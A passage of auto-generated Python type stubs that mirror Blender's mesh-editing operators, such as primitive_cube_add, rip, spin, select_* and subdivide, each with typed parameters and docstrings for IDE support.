:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_face_at_cursor_move(MESH_OT_polybuild_face_at_cursor=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_face_at_cursor: Poly Build Face at Cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def polybuild_split_at_cursor(
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_split_at_cursor_move(MESH_OT_polybuild_split_at_cursor=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_split_at_cursor: Poly Build Split at Cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def polybuild_transform_at_cursor(
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_transform_at_cursor_move(
MESH_OT_polybuild_transform_at_cursor=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def primitive_circle_add(vertices: int = 32,
radius: float = 1.0,
fill_type: typing.Union[int, str] = 'NOTHING',
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a circle mesh
:param vertices: Vertices
:type vertices: int
:param radius: Radius
:type radius: float
:param fill_type: Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans.
:type fill_type: typing.Union[int, str]
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_cone_add(vertices: int = 32,
radius1: float = 1.0,
radius2: float = 0.0,
depth: float = 2.0,
end_fill_type: typing.Union[int, str] = 'NGON',
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a conic mesh
:param vertices: Vertices
:type vertices: int
:param radius1: Radius 1
:type radius1: float
:param radius2: Radius 2
:type radius2: float
:param depth: Depth
:type depth: float
:param end_fill_type: Base Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans.
:type end_fill_type: typing.Union[int, str]
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_cube_add(size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a cube mesh
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
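# Editor's note (illustrative, not part of the generated stubs): inside a
# running Blender these operators are invoked through bpy.ops.mesh, e.g.
#   bpy.ops.mesh.primitive_cube_add(size=2.0, location=(0.0, 0.0, 1.0))
# The functions in this module only mirror the operator signatures for IDE
# support; the real implementations live in Blender itself.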
def primitive_cube_add_gizmo(
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0),
matrix: float = ((0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0),
(0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0))):
'''Construct a cube mesh
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
:param matrix: Matrix
:type matrix: float
'''
pass
def primitive_cylinder_add(vertices: int = 32,
radius: float = 1.0,
depth: float = 2.0,
end_fill_type: typing.Union[int, str] = 'NGON',
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a cylinder mesh
:param vertices: Vertices
:type vertices: int
:param radius: Radius
:type radius: float
:param depth: Depth
:type depth: float
:param end_fill_type: Cap Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans.
:type end_fill_type: typing.Union[int, str]
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_grid_add(x_subdivisions: int = 10,
y_subdivisions: int = 10,
size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a grid mesh
:param x_subdivisions: X Subdivisions
:type x_subdivisions: int
:param y_subdivisions: Y Subdivisions
:type y_subdivisions: int
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_ico_sphere_add(subdivisions: int = 2,
radius: float = 1.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct an Icosphere mesh
:param subdivisions: Subdivisions
:type subdivisions: int
:param radius: Radius
:type radius: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_monkey_add(size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a Suzanne mesh
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_plane_add(size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a filled planar mesh with 4 vertices
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_torus_add(align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0),
major_segments: int = 48,
minor_segments: int = 12,
mode: typing.Union[int, str] = 'MAJOR_MINOR',
major_radius: float = 1.0,
minor_radius: float = 0.25,
abso_major_rad: float = 1.25,
abso_minor_rad: float = 0.75,
generate_uvs: bool = True):
'''Construct a torus mesh
:param align: AlignWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location
:type location: float
:param rotation: Rotation
:type rotation: float
:param major_segments: Major Segments, Number of segments for the main ring of the torus
:type major_segments: int
:param minor_segments: Minor Segments, Number of segments for the minor ring of the torus
:type minor_segments: int
:param mode: Torus DimensionsMAJOR_MINOR Major/Minor, Use the major/minor radii for torus dimensions.EXT_INT Exterior/Interior, Use the exterior/interior radii for torus dimensions.
:type mode: typing.Union[int, str]
:param major_radius: Major Radius, Radius from the origin to the center of the cross sections
:type major_radius: float
:param minor_radius: Minor Radius, Radius of the torus’ cross section
:type minor_radius: float
:param abso_major_rad: Exterior Radius, Total Exterior Radius of the torus
:type abso_major_rad: float
:param abso_minor_rad: Interior Radius, Total Interior Radius of the torus
:type abso_minor_rad: float
:param generate_uvs: Generate UVs, Generate a default UV map
:type generate_uvs: bool
'''
pass
def primitive_uv_sphere_add(segments: int = 32,
ring_count: int = 16,
radius: float = 1.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a UV sphere mesh
:param segments: Segments
:type segments: int
:param ring_count: Rings
:type ring_count: int
:param radius: Radius
:type radius: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def quads_convert_to_tris(quad_method: typing.Union[int, str] = 'BEAUTY',
ngon_method: typing.Union[int, str] = 'BEAUTY'):
'''Triangulate selected faces
:param quad_method: Quad Method, Method for splitting the quads into trianglesBEAUTY Beauty , Split the quads in nice triangles, slower method.FIXED Fixed, Split the quads on the first and third vertices.FIXED_ALTERNATE Fixed Alternate, Split the quads on the 2nd and 4th vertices.SHORTEST_DIAGONAL Shortest Diagonal, Split the quads based on the distance between the vertices.
:type quad_method: typing.Union[int, str]
:param ngon_method: Polygon Method, Method for splitting the polygons into trianglesBEAUTY Beauty, Arrange the new triangles evenly (slow).CLIP Clip, Split the polygons with an ear clipping algorithm.
:type ngon_method: typing.Union[int, str]
'''
pass
def region_to_loop():
'''Select boundary edges around the selected faces
'''
pass
def remove_doubles(threshold: float = 0.0001, use_unselected: bool = False):
'''Merge vertices based on their proximity
:param threshold: Merge Distance, Maximum distance between elements to merge
:type threshold: float
:param use_unselected: Unselected, Merge selected to other unselected vertices
:type use_unselected: bool
'''
pass
def reveal(select: bool = True):
'''Reveal all hidden vertices, edges and faces
:param select: Select
:type select: bool
'''
pass
def rip(mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False,
use_fill: bool = False):
'''Disconnect vertex or edges from connected geometry
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
:param use_fill: Fill, Fill the ripped region
:type use_fill: bool
'''
pass
def rip_edge(mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Extend vertices along the edge closest to the cursor
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def rip_edge_move(MESH_OT_rip_edge=None, TRANSFORM_OT_translate=None):
'''Extend vertices and move the result
:param MESH_OT_rip_edge: Extend Vertices, Extend vertices along the edge closest to the cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def rip_move(MESH_OT_rip=None, TRANSFORM_OT_translate=None):
'''Rip polygons and move the result
:param MESH_OT_rip: Rip, Disconnect vertex or edges from connected geometry
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def screw(steps: int = 9,
turns: int = 1,
center: float = (0.0, 0.0, 0.0),
axis: float = (0.0, 0.0, 0.0)):
'''Extrude selected vertices in screw-shaped rotation around the cursor in indicated viewport
:param steps: Steps, Steps
:type steps: int
:param turns: Turns, Turns
:type turns: int
:param center: Center, Center in global view space
:type center: float
:param axis: Axis, Axis in global view space
:type axis: float
'''
pass
def select_all(action: typing.Union[int, str] = 'TOGGLE'):
'''(De)select all vertices, edges or faces
:param action: Action, Selection action to executeTOGGLE Toggle, Toggle selection for all elements.SELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.INVERT Invert, Invert selection of all elements.
:type action: typing.Union[int, str]
'''
pass
def select_axis(orientation: typing.Union[int, str] = 'LOCAL',
sign: typing.Union[int, str] = 'POS',
axis: typing.Union[int, str] = 'X',
threshold: float = 0.0001):
'''Select all data in the mesh on a single axis
:param orientation: Axis Mode, Axis orientationGLOBAL Global, Align the transformation axes to world space.LOCAL Local, Align the transformation axes to the selected objects’ local space.NORMAL Normal, Align the transformation axes to average normal of selected elements (bone Y axis for pose mode).GIMBAL Gimbal, Align each axis to the Euler rotation axis as used for input.VIEW View, Align the transformation axes to the window.CURSOR Cursor, Align the transformation axes to the 3D cursor.
:type orientation: typing.Union[int, str]
:param sign: Axis Sign, Side to select
:type sign: typing.Union[int, str]
:param axis: Axis, Select the axis to compare each vertex on
:type axis: typing.Union[int, str]
:param threshold: Threshold
:type threshold: float
'''
pass
def select_face_by_sides(number: int = 4,
type: typing.Union[int, str] = 'EQUAL',
extend: bool = True):
'''Select vertices or faces by the number of polygon sides
:param number: Number of Vertices
:type number: int
:param type: Type, Type of comparison to make
:type type: typing.Union[int, str]
:param extend: Extend, Extend the selection
:type extend: bool
'''
pass
def select_interior_faces():
'''Select faces where all edges have more than 2 face users
'''
pass
def select_less(use_face_step: bool = True):
'''Deselect vertices, edges or faces at the boundary of each selection region
:param use_face_step: Face Step, Connected faces (instead of edges)
:type use_face_step: bool
'''
pass
def select_linked(delimit: typing.Set[typing.Union[int, str]] = {'SEAM'}):
'''Select all vertices connected to the current selection
:param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates.
:type delimit: typing.Set[typing.Union[int, str]]
'''
pass
def select_linked_pick(deselect: bool = False,
delimit: typing.Set[typing.Union[int, str]] = {'SEAM'},
index=-1):
'''(De)select all vertices linked to the edge under the mouse cursor
:param deselect: Deselect
:type deselect: bool
:param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates.
:type delimit: typing.Set[typing.Union[int, str]]
'''
pass
def select_loose(extend: bool = False):
'''Select loose geometry based on the selection mode
:param extend: Extend, Extend the selection
:type extend: bool
'''
pass
def select_mirror(axis: typing.Set[typing.Union[int, str]] = {'X'},
extend: bool = False):
'''Select mesh items at mirrored locations
:param axis: Axis
:type axis: typing.Set[typing.Union[int, str]]
:param extend: Extend, Extend the existing selection
:type extend: bool
'''
pass
def select_mode(use_extend: bool = False,
use_expand: bool = False,
type: typing.Union[int, str] = 'VERT',
action: typing.Union[int, str] = 'TOGGLE'):
'''Change selection mode
:param use_extend: Extend
:type use_extend: bool
:param use_expand: Expand
:type use_expand: bool
:param type: TypeVERT Vertex, Vertex selection mode.EDGE Edge, Edge selection mode.FACE Face, Face selection mode.
:type type: typing.Union[int, str]
:param action: Action, Selection action to executeDISABLE Disable, Disable selected markers.ENABLE Enable, Enable selected markers.TOGGLE Toggle, Toggle disabled flag for selected markers.
:type action: typing.Union[int, str]
'''
pass
def select_more(use_face_step: bool = True):
'''Select more vertices, edges or faces connected to initial selection
:param use_face_step: Face Step, Connected faces (instead of edges)
:type use_face_step: bool
'''
pass
def select_next_item():
'''Select the next element (using selection order)
'''
pass
def select_non_manifold(extend: bool = True,
use_wire: bool = True,
use_boundary: bool = True,
use_multi_face: bool = True,
use_non_contiguous: bool = True,
use_verts: bool = True):
'''Select all non-manifold vertices or edges
:param extend: Extend, Extend the selection
:type extend: bool
:param use_wire: Wire, Wire edges
:type use_wire: bool
:param use_boundary: Boundaries, Boundary edges
:type use_boundary: bool
:param use_multi_face: Multiple Faces, Edges shared by 3+ faces
:type use_multi_face: bool
:param use_non_contiguous: Non Contiguous, Edges between faces pointing in alternate directions
:type use_non_contiguous: bool
:param use_verts: Vertices, Vertices connecting multiple face regions
:type use_verts: bool
'''
pass
def select_nth(skip: int = 1, nth: int = 1, offset: int = 0):
'''Deselect every Nth element starting from the active vertex, edge or face
:param skip: Deselected, Number of deselected elements in the repetitive sequence
:type skip: int
:param nth: Selected, Number of selected elements in the repetitive sequence
:type nth: int
:param offset: Offset, Offset from the starting point
:type offset: int
'''
pass
def select_prev_item():
'''Select the previous element (using selection order)
'''
pass
def select_random(percent: float = 50.0,
seed: int = 0,
action: typing.Union[int, str] = 'SELECT'):
'''Randomly select vertices
:param percent: Percent, Percentage of objects to select randomly
:type percent: float
:param seed: Random Seed, Seed for the random number generator
:type seed: int
:param action: Action, Selection action to executeSELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.
:type action: typing.Union[int, str]
'''
pass
def select_similar(type: typing.Union[int, str] = 'NORMAL',
compare: typing.Union[int, str] = 'EQUAL',
threshold: float = 0.0):
'''Select similar vertices, edges or faces by property types
:param type: Type
:type type: typing.Union[int, str]
:param compare: Compare
:type compare: typing.Union[int, str]
:param threshold: Threshold
:type threshold: float
'''
pass
def select_similar_region():
'''Select similar face regions to the current selection
'''
pass
def select_ungrouped(extend: bool = False):
'''Select vertices without a group
:param extend: Extend, Extend the selection
:type extend: bool
'''
pass
def separate(type: typing.Union[int, str] = 'SELECTED'):
'''Separate selected geometry into a new mesh
:param type: Type
:type type: typing.Union[int, str]
'''
pass
def set_normals_from_faces(keep_sharp: bool = False):
'''Set the custom normals from the selected faces ones
:param keep_sharp: Keep Sharp Edges, Do not set sharp edges to face
:type keep_sharp: bool
'''
pass
def shape_propagate_to_all():
'''Apply selected vertex locations to all other shape keys
'''
pass
def shortest_path_pick(edge_mode: typing.Union[int, str] = 'SELECT',
use_face_step: bool = False,
use_topology_distance: bool = False,
use_fill: bool = False,
skip: int = 0,
nth: int = 1,
offset: int = 0,
index=-1):
'''Select shortest path between two selections
:param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path
:type edge_mode: typing.Union[int, str]
:param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings)
:type use_face_step: bool
:param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance
:type use_topology_distance: bool
:param use_fill: Fill Region, Select all paths between the source/destination elements
:type use_fill: bool
:param skip: Deselected, Number of deselected elements in the repetitive sequence
:type skip: int
:param nth: Selected, Number of selected elements in the repetitive sequence
:type nth: int
:param offset: Offset, Offset from the starting point
:type offset: int
'''
pass
def shortest_path_select(edge_mode: typing.Union[int, str] = 'SELECT',
use_face_step: bool = False,
use_topology_distance: bool = False,
use_fill: bool = False,
skip: int = 0,
nth: int = 1,
offset: int = 0):
'''Selected shortest path between two vertices/edges/faces
:param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path
:type edge_mode: typing.Union[int, str]
:param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings)
:type use_face_step: bool
:param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance
:type use_topology_distance: bool
:param use_fill: Fill Region, Select all paths between the source/destination elements
:type use_fill: bool
:param skip: Deselected, Number of deselected elements in the repetitive sequence
:type skip: int
:param nth: Selected, Number of selected elements in the repetitive sequence
:type nth: int
:param offset: Offset, Offset from the starting point
:type offset: int
'''
pass
def smoothen_normals(factor: float = 0.5):
'''Smoothen custom normals based on adjacent vertex normals
:param factor: Factor, Specifies weight of smooth vs original normal
:type factor: float
'''
pass
def solidify(thickness: float = 0.01):
'''Create a solid skin by extruding, compensating for sharp angles
:param thickness: Thickness
:type thickness: float
'''
pass
def sort_elements(type: typing.Union[int, str] = 'VIEW_ZAXIS',
elements: typing.Set[typing.Union[int, str]] = {'VERT'},
reverse: bool = False,
seed: int = 0):
'''The order of selected vertices/edges/faces is modified, based on a given method
:param type: Type, Type of re-ordering operation to applyVIEW_ZAXIS View Z Axis, Sort selected elements from farthest to nearest one in current view.VIEW_XAXIS View X Axis, Sort selected elements from left to right one in current view.CURSOR_DISTANCE Cursor Distance, Sort selected elements from nearest to farthest from 3D cursor.MATERIAL Material, Sort selected elements from smallest to greatest material index (faces only!).SELECTED Selected, Move all selected elements in first places, preserving their relative order (WARNING: this will affect unselected elements’ indices as well!).RANDOMIZE Randomize, Randomize order of selected elements.REVERSE Reverse, Reverse current order of selected elements.
:type type: typing.Union[int, str]
:param elements: Elements, Which elements to affect (vertices, edges and/or faces)
:type elements: typing.Set[typing.Union[int, str]]
:param reverse: Reverse, Reverse the sorting effect
:type reverse: bool
:param seed: Seed, Seed for random-based operations
:type seed: int
'''
pass
def spin(steps: int = 9,
dupli: bool = False,
angle: float = 1.5708,
use_auto_merge: bool = True,
use_normal_flip: bool = False,
center: float = (0.0, 0.0, 0.0),
axis: float = (0.0, 0.0, 0.0)):
'''Extrude selected vertices in a circle around the cursor in indicated viewport
:param steps: Steps, Steps
:type steps: int
:param dupli: Use Duplicates
:type dupli: bool
:param angle: Angle, Rotation for each step
:type angle: float
:param use_auto_merge: Auto Merge, Merge first/last when the angle is a full revolution
:type use_auto_merge: bool
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param center: Center, Center in global view space
:type center: float
:param axis: Axis, Axis in global view space
:type axis: float
'''
pass
def split():
'''Split off selected geometry from connected unselected geometry
'''
pass
def split_normals():
'''Split custom normals of selected vertices
'''
pass
def subdivide(number_cuts: int = 1,
smoothness: float = 0.0,
ngon: bool = True,
quadcorner: typing.Union[int, str] = 'STRAIGHT_CUT',
fractal: float = 0.0,
fractal_along_normal: float = 0.0,
seed: int = 0):
'''Subdivide selected edges
:param number_cuts: Number of Cuts
:type number_cuts: int
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param ngon: Create N-Gons, When disabled, newly created faces are limited to 3-4 sided faces
:type ngon: bool
:param quadcorner: Quad Corner Type, How to subdivide quad corners (anything other than Straight Cut will prevent ngons)
:type quadcorner: typing.Union[int, str]
:param fractal: Fractal, Fractal randomness factor
:type fractal: float
:param fractal_along_normal: Along Normal, Apply fractal displacement along normal only
:type fractal_along_normal: float
:param seed: Random Seed, Seed for the random number generator
:type seed: int
'''
pass
def subdivide_edgering(number_cuts: int = 10,
interpolation: typing.Union[int, str] = 'PATH',
smoothness: float = 1.0,
profile_shape_factor: float = 0.0,
profile_shape: typing.Union[int, str] = 'SMOOTH'):
'''Subdivide perpendicular edges to the selected edge ring
:param number_cuts: Number of Cuts
:type number_cuts: int
:param interpolation: Interpolation, Interpolation method
:type interpolation: typing.Union[int, str]
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded
:type profile_shape_factor: float
:param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.
:type profile_shape: typing.Union[int, str]
'''
pass
def symmetrize(direction: typing.Union[int, str] = 'NEGATIVE_X',
